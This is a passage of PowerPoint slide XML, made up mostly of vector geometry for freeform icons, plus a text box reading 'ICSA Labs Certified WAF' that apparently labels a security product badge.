                        <a:pt x="317" y="56"/>
                        <a:pt x="317" y="56"/>
                        <a:pt x="317" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="307" y="36"/>
                        <a:pt x="295" y="17"/>
                        <a:pt x="280" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="42" y="278"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="277"/>
                        <a:pt x="45" y="276"/>
                        <a:pt x="47" y="275"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="276"/>
                        <a:pt x="43" y="277"/>
                        <a:pt x="41" y="278"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="278"/>
                        <a:pt x="42" y="278"/>
                        <a:pt x="42" y="2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70" name="Freeform 169">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4F8F6F-E755-AB43-95F3-2FFC77B7126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0223099" y="12120586"/>
                  <a:ext cx="2211388" cy="2211388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 178 w 522"/>
                    <a:gd name="T1" fmla="*/ 261 h 522"/>
                    <a:gd name="T2" fmla="*/ 235 w 522"/>
                    <a:gd name="T3" fmla="*/ 270 h 522"/>
                    <a:gd name="T4" fmla="*/ 235 w 522"/>
                    <a:gd name="T5" fmla="*/ 252 h 522"/>
                    <a:gd name="T6" fmla="*/ 344 w 522"/>
                    <a:gd name="T7" fmla="*/ 270 h 522"/>
                    <a:gd name="T8" fmla="*/ 344 w 522"/>
                    <a:gd name="T9" fmla="*/ 252 h 522"/>
                    <a:gd name="T10" fmla="*/ 288 w 522"/>
                    <a:gd name="T11" fmla="*/ 261 h 522"/>
                    <a:gd name="T12" fmla="*/ 344 w 522"/>
                    <a:gd name="T13" fmla="*/ 270 h 522"/>
                    <a:gd name="T14" fmla="*/ 478 w 522"/>
                    <a:gd name="T15" fmla="*/ 152 h 522"/>
                    <a:gd name="T16" fmla="*/ 423 w 522"/>
                    <a:gd name="T17" fmla="*/ 252 h 522"/>
                    <a:gd name="T18" fmla="*/ 389 w 522"/>
                    <a:gd name="T19" fmla="*/ 152 h 522"/>
                    <a:gd name="T20" fmla="*/ 351 w 522"/>
                    <a:gd name="T21" fmla="*/ 252 h 522"/>
                    <a:gd name="T22" fmla="*/ 351 w 522"/>
                    <a:gd name="T23" fmla="*/ 270 h 522"/>
                    <a:gd name="T24" fmla="*/ 389 w 522"/>
                    <a:gd name="T25" fmla="*/ 370 h 522"/>
                    <a:gd name="T26" fmla="*/ 423 w 522"/>
                    <a:gd name="T27" fmla="*/ 270 h 522"/>
                    <a:gd name="T28" fmla="*/ 478 w 522"/>
                    <a:gd name="T29" fmla="*/ 370 h 522"/>
                    <a:gd name="T30" fmla="*/ 522 w 522"/>
                    <a:gd name="T31" fmla="*/ 261 h 522"/>
                    <a:gd name="T32" fmla="*/ 271 w 522"/>
                    <a:gd name="T33" fmla="*/ 270 h 522"/>
                    <a:gd name="T34" fmla="*/ 282 w 522"/>
                    <a:gd name="T35" fmla="*/ 261 h 522"/>
                    <a:gd name="T36" fmla="*/ 271 w 522"/>
                    <a:gd name="T37" fmla="*/ 252 h 522"/>
                    <a:gd name="T38" fmla="*/ 261 w 522"/>
                    <a:gd name="T39" fmla="*/ 198 h 522"/>
                    <a:gd name="T40" fmla="*/ 252 w 522"/>
                    <a:gd name="T41" fmla="*/ 252 h 522"/>
                    <a:gd name="T42" fmla="*/ 241 w 522"/>
                    <a:gd name="T43" fmla="*/ 261 h 522"/>
                    <a:gd name="T44" fmla="*/ 252 w 522"/>
                    <a:gd name="T45" fmla="*/ 270 h 522"/>
                    <a:gd name="T46" fmla="*/ 261 w 522"/>
                    <a:gd name="T47" fmla="*/ 324 h 522"/>
                    <a:gd name="T48" fmla="*/ 271 w 522"/>
                    <a:gd name="T49" fmla="*/ 270 h 522"/>
                    <a:gd name="T50" fmla="*/ 99 w 522"/>
                    <a:gd name="T51" fmla="*/ 270 h 522"/>
                    <a:gd name="T52" fmla="*/ 133 w 522"/>
                    <a:gd name="T53" fmla="*/ 370 h 522"/>
                    <a:gd name="T54" fmla="*/ 172 w 522"/>
                    <a:gd name="T55" fmla="*/ 270 h 522"/>
                    <a:gd name="T56" fmla="*/ 172 w 522"/>
                    <a:gd name="T57" fmla="*/ 252 h 522"/>
                    <a:gd name="T58" fmla="*/ 133 w 522"/>
                    <a:gd name="T59" fmla="*/ 152 h 522"/>
                    <a:gd name="T60" fmla="*/ 99 w 522"/>
                    <a:gd name="T61" fmla="*/ 252 h 522"/>
                    <a:gd name="T62" fmla="*/ 45 w 522"/>
                    <a:gd name="T63" fmla="*/ 152 h 522"/>
                    <a:gd name="T64" fmla="*/ 0 w 522"/>
                    <a:gd name="T65" fmla="*/ 261 h 522"/>
                    <a:gd name="T66" fmla="*/ 45 w 522"/>
                    <a:gd name="T67" fmla="*/ 370 h 522"/>
                    <a:gd name="T68" fmla="*/ 184 w 522"/>
                    <a:gd name="T69" fmla="*/ 31 h 522"/>
                    <a:gd name="T70" fmla="*/ 143 w 522"/>
                    <a:gd name="T71" fmla="*/ 82 h 522"/>
                    <a:gd name="T72" fmla="*/ 252 w 522"/>
                    <a:gd name="T73" fmla="*/ 19 h 522"/>
                    <a:gd name="T74" fmla="*/ 261 w 522"/>
                    <a:gd name="T75" fmla="*/ 106 h 522"/>
                    <a:gd name="T76" fmla="*/ 271 w 522"/>
                    <a:gd name="T77" fmla="*/ 19 h 522"/>
                    <a:gd name="T78" fmla="*/ 380 w 522"/>
                    <a:gd name="T79" fmla="*/ 82 h 522"/>
                    <a:gd name="T80" fmla="*/ 339 w 522"/>
                    <a:gd name="T81" fmla="*/ 31 h 522"/>
                    <a:gd name="T82" fmla="*/ 452 w 522"/>
                    <a:gd name="T83" fmla="*/ 82 h 522"/>
                    <a:gd name="T84" fmla="*/ 71 w 522"/>
                    <a:gd name="T85" fmla="*/ 82 h 522"/>
                    <a:gd name="T86" fmla="*/ 184 w 522"/>
                    <a:gd name="T87" fmla="*/ 31 h 522"/>
                    <a:gd name="T88" fmla="*/ 377 w 522"/>
                    <a:gd name="T89" fmla="*/ 444 h 522"/>
                    <a:gd name="T90" fmla="*/ 358 w 522"/>
                    <a:gd name="T91" fmla="*/ 439 h 522"/>
                    <a:gd name="T92" fmla="*/ 271 w 522"/>
                    <a:gd name="T93" fmla="*/ 421 h 522"/>
                    <a:gd name="T94" fmla="*/ 252 w 522"/>
                    <a:gd name="T95" fmla="*/ 421 h 522"/>
                    <a:gd name="T96" fmla="*/ 165 w 522"/>
                    <a:gd name="T97" fmla="*/ 439 h 522"/>
                    <a:gd name="T98" fmla="*/ 145 w 522"/>
                    <a:gd name="T99" fmla="*/ 444 h 522"/>
                    <a:gd name="T100" fmla="*/ 97 w 522"/>
                    <a:gd name="T101" fmla="*/ 439 h 522"/>
                    <a:gd name="T102" fmla="*/ 261 w 522"/>
                    <a:gd name="T103" fmla="*/ 522 h 522"/>
                    <a:gd name="T104" fmla="*/ 425 w 522"/>
                    <a:gd name="T105" fmla="*/ 439 h 5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522" h="522">
                      <a:moveTo>
                        <a:pt x="179" y="252"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="255"/>
                        <a:pt x="178" y="258"/>
                        <a:pt x="178" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="264"/>
                        <a:pt x="179" y="267"/>
                        <a:pt x="179" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="270"/>
                        <a:pt x="235" y="270"/>
                        <a:pt x="235" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="234" y="267"/>
                        <a:pt x="234" y="264"/>
                        <a:pt x="234" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="234" y="258"/>
                        <a:pt x="234" y="255"/>
                        <a:pt x="235" y="252"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="179" y="252"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="344" y="270"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="344" y="267"/>
                        <a:pt x="344" y="264"/>
                        <a:pt x="344" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="344" y="258"/>
                        <a:pt x="344" y="255"/>
                        <a:pt x="344" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="288" y="252"/>
                        <a:pt x="288" y="252"/>
                        <a:pt x="288" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="288" y="255"/>
                        <a:pt x="288" y="258"/>
                        <a:pt x="288" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="288" y="264"/>
                        <a:pt x="288" y="267"/>
                        <a:pt x="288" y="270"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="344" y="270"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="498" y="152"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="478" y="152"/>
                        <a:pt x="478" y="152"/>
                        <a:pt x="478" y="152"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="493" y="182"/>
                        <a:pt x="502" y="216"/>
                        <a:pt x="504" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="423" y="252"/>
                        <a:pt x="423" y="252"/>
                        <a:pt x="423" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="422" y="217"/>
                        <a:pt x="417" y="183"/>
                        <a:pt x="409" y="152"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="389" y="152"/>
                        <a:pt x="389" y="152"/>
                        <a:pt x="389" y="152"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="399" y="183"/>
                        <a:pt x="404" y="216"/>
                        <a:pt x="405" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="351" y="252"/>
                        <a:pt x="351" y="252"/>
                        <a:pt x="351" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="351" y="255"/>
                        <a:pt x="351" y="258"/>
                        <a:pt x="351" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="351" y="264"/>
                        <a:pt x="351" y="267"/>
                        <a:pt x="351" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="405" y="270"/>
                        <a:pt x="405" y="270"/>
                        <a:pt x="405" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="404" y="305"/>
                        <a:pt x="399" y="339"/>
                        <a:pt x="389" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="409" y="370"/>
                        <a:pt x="409" y="370"/>
                        <a:pt x="409" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="417" y="339"/>
                        <a:pt x="422" y="305"/>
                        <a:pt x="423" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="504" y="270"/>
                        <a:pt x="504" y="270"/>
                        <a:pt x="504" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="502" y="306"/>
                        <a:pt x="493" y="340"/>
                        <a:pt x="478" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="498" y="370"/>
                        <a:pt x="498" y="370"/>
                        <a:pt x="498" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="514" y="337"/>
                        <a:pt x="522" y="300"/>
                        <a:pt x="522" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="522" y="222"/>
                        <a:pt x="514" y="185"/>
                        <a:pt x="498" y="152"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="271" y="270"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="281" y="270"/>
                        <a:pt x="281" y="270"/>
                        <a:pt x="281" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="281" y="267"/>
                        <a:pt x="282" y="264"/>
                        <a:pt x="282" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="282" y="258"/>
                        <a:pt x="281" y="255"/>
                        <a:pt x="281" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="271" y="252"/>
                        <a:pt x="271" y="252"/>
                        <a:pt x="271" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="271" y="213"/>
                        <a:pt x="271" y="213"/>
                        <a:pt x="271" y="213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="268" y="208"/>
                        <a:pt x="265" y="203"/>
                        <a:pt x="261" y="198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="258" y="203"/>
                        <a:pt x="255" y="208"/>
                        <a:pt x="252" y="214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="252" y="252"/>
                        <a:pt x="252" y="252"/>
                        <a:pt x="252" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="241" y="252"/>
                        <a:pt x="241" y="252"/>
                        <a:pt x="241" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="241" y="255"/>
                        <a:pt x="241" y="258"/>
                        <a:pt x="241" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="241" y="264"/>
                        <a:pt x="241" y="267"/>
                        <a:pt x="241" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="252" y="270"/>
                        <a:pt x="252" y="270"/>
                        <a:pt x="252" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="252" y="308"/>
                        <a:pt x="252" y="308"/>
                        <a:pt x="252" y="308"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="255" y="314"/>
                        <a:pt x="258" y="319"/>
                        <a:pt x="261" y="324"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="265" y="319"/>
                        <a:pt x="268" y="314"/>
                        <a:pt x="271" y="308"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="271" y="270"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="19" y="270"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="99" y="270"/>
                        <a:pt x="99" y="270"/>
                        <a:pt x="99" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="100" y="305"/>
                        <a:pt x="105" y="339"/>
                        <a:pt x="114" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="133" y="370"/>
                        <a:pt x="133" y="370"/>
                        <a:pt x="133" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="339"/>
                        <a:pt x="119" y="305"/>
                        <a:pt x="118" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="172" y="270"/>
                        <a:pt x="172" y="270"/>
                        <a:pt x="172" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="172" y="267"/>
                        <a:pt x="172" y="264"/>
                        <a:pt x="172" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="172" y="258"/>
                        <a:pt x="172" y="255"/>
                        <a:pt x="172" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="118" y="252"/>
                        <a:pt x="118" y="252"/>
                        <a:pt x="118" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="216"/>
                        <a:pt x="124" y="183"/>
                        <a:pt x="133" y="152"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="114" y="152"/>
                        <a:pt x="114" y="152"/>
                        <a:pt x="114" y="152"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="183"/>
                        <a:pt x="100" y="217"/>
                        <a:pt x="99" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="252"/>
                        <a:pt x="19" y="252"/>
                        <a:pt x="19" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="216"/>
                        <a:pt x="30" y="182"/>
                        <a:pt x="45" y="152"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24" y="152"/>
                        <a:pt x="24" y="152"/>
                        <a:pt x="24" y="152"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="185"/>
                        <a:pt x="0" y="222"/>
                        <a:pt x="0" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="300"/>
                        <a:pt x="9" y="337"/>
                        <a:pt x="24" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="370"/>
                        <a:pt x="45" y="370"/>
                        <a:pt x="45" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="340"/>
                        <a:pt x="20" y="306"/>
                        <a:pt x="19" y="270"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="184" y="31"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="43"/>
                        <a:pt x="157" y="59"/>
                        <a:pt x="145" y="78"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="79"/>
                        <a:pt x="144" y="81"/>
                        <a:pt x="143" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="82"/>
                        <a:pt x="165" y="82"/>
                        <a:pt x="165" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="189" y="45"/>
                        <a:pt x="219" y="22"/>
                        <a:pt x="252" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="252" y="101"/>
                        <a:pt x="252" y="101"/>
                        <a:pt x="252" y="101"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="255" y="103"/>
                        <a:pt x="258" y="104"/>
                        <a:pt x="261" y="106"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="264" y="104"/>
                        <a:pt x="267" y="103"/>
                        <a:pt x="271" y="101"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="271" y="19"/>
                        <a:pt x="271" y="19"/>
                        <a:pt x="271" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="303" y="22"/>
                        <a:pt x="334" y="45"/>
                        <a:pt x="358" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="380" y="82"/>
                        <a:pt x="380" y="82"/>
                        <a:pt x="380" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="379" y="81"/>
                        <a:pt x="378" y="79"/>
                        <a:pt x="377" y="78"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="366" y="59"/>
                        <a:pt x="353" y="43"/>
                        <a:pt x="339" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="371" y="42"/>
                        <a:pt x="401" y="60"/>
                        <a:pt x="425" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="452" y="82"/>
                        <a:pt x="452" y="82"/>
                        <a:pt x="452" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="404" y="32"/>
                        <a:pt x="336" y="0"/>
                        <a:pt x="261" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="0"/>
                        <a:pt x="119" y="32"/>
                        <a:pt x="71" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="82"/>
                        <a:pt x="97" y="82"/>
                        <a:pt x="97" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122" y="60"/>
                        <a:pt x="151" y="42"/>
                        <a:pt x="184" y="31"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="339" y="491"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="353" y="478"/>
                        <a:pt x="366" y="463"/>
                        <a:pt x="377" y="444"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="442"/>
                        <a:pt x="379" y="441"/>
                        <a:pt x="380" y="439"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="358" y="439"/>
                        <a:pt x="358" y="439"/>
                        <a:pt x="358" y="439"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="334" y="477"/>
                        <a:pt x="303" y="499"/>
                        <a:pt x="271" y="503"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="271" y="421"/>
                        <a:pt x="271" y="421"/>
                        <a:pt x="271" y="421"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="267" y="419"/>
                        <a:pt x="264" y="418"/>
                        <a:pt x="261" y="416"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="258" y="418"/>
                        <a:pt x="255" y="419"/>
                        <a:pt x="252" y="421"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="252" y="503"/>
                        <a:pt x="252" y="503"/>
                        <a:pt x="252" y="503"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="219" y="499"/>
                        <a:pt x="189" y="477"/>
                        <a:pt x="165" y="439"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="143" y="439"/>
                        <a:pt x="143" y="439"/>
                        <a:pt x="143" y="439"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="441"/>
                        <a:pt x="144" y="442"/>
                        <a:pt x="145" y="444"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="157" y="463"/>
                        <a:pt x="170" y="478"/>
                        <a:pt x="184" y="491"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="480"/>
                        <a:pt x="122" y="462"/>
                        <a:pt x="97" y="439"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="439"/>
                        <a:pt x="71" y="439"/>
                        <a:pt x="71" y="439"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="490"/>
                        <a:pt x="186" y="522"/>
                        <a:pt x="261" y="522"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="336" y="522"/>
                        <a:pt x="404" y="490"/>
                        <a:pt x="452" y="439"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="425" y="439"/>
                        <a:pt x="425" y="439"/>
                        <a:pt x="425" y="439"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="401" y="462"/>
                        <a:pt x="371" y="480"/>
                        <a:pt x="339" y="4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</p:grp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5ED09A31-4FCE-1340-8565-25171EDBB9C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6383728" y="5662571"/>
              <a:ext cx="541556" cy="717595"/>
              <a:chOff x="3378291" y="5662571"/>
              <a:chExt cx="541556" cy="717595"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="172" name="Shape 111">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C87E8E4-60B7-9C4C-8E03-BD51BE905526}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3378291" y="6103167"/>
                <a:ext cx="541556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ICSA </a:t>
                </a:r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Labs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Certified WAF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  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="173" name="그룹 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FACC0BD6-FE56-7542-B7BA-98DA3E25E799}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3379738" y="5662571"/>
                <a:ext cx="538665" cy="313742"/>
                <a:chOff x="13722287" y="12188849"/>
                <a:chExt cx="3417887" cy="199072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74" name="Rectangle 39">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B142C2C-5004-8E4E-B8BA-DB1BAF1C38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743174" y="12887349"/>
                  <a:ext cx="109538" cy="576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75" name="Freeform 40">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D989E499-5B24-7D4E-8712-FB5C54ADD84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722287" y="12188849"/>
                  <a:ext cx="2008188" cy="1411288"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 259 w 474"/>
                    <a:gd name="T1" fmla="*/ 23 h 333"/>
                    <a:gd name="T2" fmla="*/ 55 w 474"/>
                    <a:gd name="T3" fmla="*/ 164 h 333"/>
                    <a:gd name="T4" fmla="*/ 78 w 474"/>
                    <a:gd name="T5" fmla="*/ 164 h 333"/>
                    <a:gd name="T6" fmla="*/ 78 w 474"/>
                    <a:gd name="T7" fmla="*/ 302 h 333"/>
                    <a:gd name="T8" fmla="*/ 49 w 474"/>
                    <a:gd name="T9" fmla="*/ 302 h 333"/>
                    <a:gd name="T10" fmla="*/ 49 w 474"/>
                    <a:gd name="T11" fmla="*/ 174 h 333"/>
                    <a:gd name="T12" fmla="*/ 14 w 474"/>
                    <a:gd name="T13" fmla="*/ 333 h 333"/>
                    <a:gd name="T14" fmla="*/ 410 w 474"/>
                    <a:gd name="T15" fmla="*/ 333 h 333"/>
                    <a:gd name="T16" fmla="*/ 428 w 474"/>
                    <a:gd name="T17" fmla="*/ 303 h 333"/>
                    <a:gd name="T18" fmla="*/ 416 w 474"/>
                    <a:gd name="T19" fmla="*/ 271 h 333"/>
                    <a:gd name="T20" fmla="*/ 379 w 474"/>
                    <a:gd name="T21" fmla="*/ 271 h 333"/>
                    <a:gd name="T22" fmla="*/ 387 w 474"/>
                    <a:gd name="T23" fmla="*/ 248 h 333"/>
                    <a:gd name="T24" fmla="*/ 407 w 474"/>
                    <a:gd name="T25" fmla="*/ 248 h 333"/>
                    <a:gd name="T26" fmla="*/ 392 w 474"/>
                    <a:gd name="T27" fmla="*/ 199 h 333"/>
                    <a:gd name="T28" fmla="*/ 355 w 474"/>
                    <a:gd name="T29" fmla="*/ 301 h 333"/>
                    <a:gd name="T30" fmla="*/ 324 w 474"/>
                    <a:gd name="T31" fmla="*/ 301 h 333"/>
                    <a:gd name="T32" fmla="*/ 377 w 474"/>
                    <a:gd name="T33" fmla="*/ 165 h 333"/>
                    <a:gd name="T34" fmla="*/ 407 w 474"/>
                    <a:gd name="T35" fmla="*/ 165 h 333"/>
                    <a:gd name="T36" fmla="*/ 444 w 474"/>
                    <a:gd name="T37" fmla="*/ 262 h 333"/>
                    <a:gd name="T38" fmla="*/ 444 w 474"/>
                    <a:gd name="T39" fmla="*/ 113 h 333"/>
                    <a:gd name="T40" fmla="*/ 259 w 474"/>
                    <a:gd name="T41" fmla="*/ 23 h 333"/>
                    <a:gd name="T42" fmla="*/ 153 w 474"/>
                    <a:gd name="T43" fmla="*/ 279 h 333"/>
                    <a:gd name="T44" fmla="*/ 184 w 474"/>
                    <a:gd name="T45" fmla="*/ 255 h 333"/>
                    <a:gd name="T46" fmla="*/ 213 w 474"/>
                    <a:gd name="T47" fmla="*/ 255 h 333"/>
                    <a:gd name="T48" fmla="*/ 153 w 474"/>
                    <a:gd name="T49" fmla="*/ 305 h 333"/>
                    <a:gd name="T50" fmla="*/ 88 w 474"/>
                    <a:gd name="T51" fmla="*/ 238 h 333"/>
